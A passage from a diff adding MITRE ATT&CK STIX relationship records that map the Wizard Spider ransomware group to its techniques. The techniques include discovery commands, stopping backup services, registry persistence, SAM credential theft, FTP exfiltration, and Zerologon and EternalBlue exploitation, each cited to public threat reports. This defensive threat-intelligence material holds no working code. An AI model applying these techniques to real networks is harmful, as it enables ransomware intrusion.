"intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:04:00.714Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + } + ], + "id": "relationship--eaebb080-e57e-4c06-84df-376cc8bff09e", + "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "type": "relationship", + "created": "2020-11-10T16:04:00.852Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the \u201cnet view\u201d command to locate mapped network shares.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:04:00.852Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--dae7228a-89f0-4e1c-b306-b9f6d08b902d", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "type": "relationship", + "created": "2020-11-10T16:04:00.973Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:04:00.973Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--f3cc3739-9dea-41c9-ac82-038b9c92bdb0", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "type": "relationship", + "created": "2020-11-10T16:04:00.986Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has has established persistence via the Registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run and a shortcut within the startup folder.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:04:00.986Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + } + ], + "id": "relationship--aca710ff-23a3-4c78-b75a-dfe6cad337a9", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "type": "relationship", + "created": "2020-11-10T16:22:44.111Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used \"whoami\" to identify the local user and their privileges.(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:22:44.111Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--2dd33387-a109-46cd-8204-cb79a62e4830", + "target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "type": "relationship", + "created": "2020-11-10T16:24:46.847Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used administrative accounts, including Domain Admin, to move laterally within a victim network.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:46.847Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--79b0a6bc-4061-468c-ac1b-eef3dc3fb419", + "target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "type": "relationship", + "created": "2020-11-10T16:24:46.955Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:46.955Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--cd283aa1-23f1-4516-9198-9d565bd4a431", + "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "type": "relationship", + "created": "2020-11-10T16:24:47.051Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:47.051Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--5fe0a46c-7a06-4aea-9768-d611d3f3116d", + "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "type": "relationship", + "created": "2020-11-10T16:24:47.121Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated victim information using FTP.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:47.121Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--1ca344f1-97fe-453c-9f12-86130ddcebbc", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "type": "relationship", + "created": "2020-11-10T16:24:47.269Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used cmd.exe to execute commands on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:47.269Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--e24411cf-6274-4b6b-87b4-b90b01146c8d", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "type": "relationship", + "created": "2020-11-10T16:24:47.347Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used \u201csysteminfo\u201d and similar commands to acquire detailed configuration information of a victim machine.(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:47.347Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--2bb3c950-2099-4d7d-ac13-05a1470fc3c6", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "type": "relationship", + "created": "2020-11-10T16:24:47.455Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:24:47.455Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + } + ], + "id": "relationship--f3b210e4-9784-4305-8cad-6bdb4d44250f", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "type": "relationship", + "created": "2020-11-10T16:49:11.397Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used services.exe to execute scripts and executables during lateral movement within a victim network.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:11.397Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--9bd4212c-2e17-41e2-9ff3-1448642ce958", + "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "type": "relationship", + "created": "2020-11-10T16:49:11.807Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:11.807Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + } + ], + "id": "relationship--14f3eebf-40c3-48d5-ad62-356d57ccf2dc", + "target_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "type": "relationship", + "created": "2020-11-10T16:49:12.074Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:12.074Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--61c802ec-b415-4161-bf15-3a8c5cc0a243", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "type": "relationship", + "created": "2020-11-10T16:49:12.444Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI to identify anti-virus products installed on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:12.444Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--79e8a269-8ef5-4795-94ce-72bfbb03c7cb", + "target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "type": "relationship", + "created": "2020-11-10T16:49:12.555Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:12.555Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--c96e7dda-d05c-458a-8332-9e7851bb4775", + "target_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "type": "relationship", + "created": "2020-11-10T16:49:12.704Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has acquired credentials from the SAM/SECURITY registry hives.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:12.704Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--9438f268-3827-435b-98b5-79dbc0ee5213", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "type": "relationship", + "created": "2020-11-10T16:49:13.078Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Digicert code-signing certificates for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:13.078Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000", + "target_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "type": "relationship", + "created": "2020-11-10T16:49:13.291Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) obtained a code signing certificate signed by Digicert for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:13.291Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + } + ], + "id": "relationship--4e3b7cf3-298e-4db2-a920-375abd50280d", + "target_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "type": "relationship", + "created": "2020-11-10T16:49:13.445Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:13.445Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + } + ], + "id": "relationship--a25300cb-c2b7-4968-b1d7-cc4d5fe5bb4b", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "type": "relationship", + "created": "2020-11-10T16:49:13.625Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used \"ipconfig\" to identify the network configuration of a victim machine.(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:49:13.625Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "id": "relationship--82dee5a5-7890-4bed-bc8c-83ffa13a8bcf", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "type": "relationship", + "created": "2020-11-10T17:28:19.540Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has identified domain admins through the use of \u201cnet group \u2018Domain admins\u2019\u201d commands.(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.540Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " + } + ], + "id": "relationship--585842e6-fe9a-4508-8e67-c232f8aa5e76", + "target_ref": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "type": "relationship", + "created": "2020-11-10T18:04:03.571Z", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.571Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). 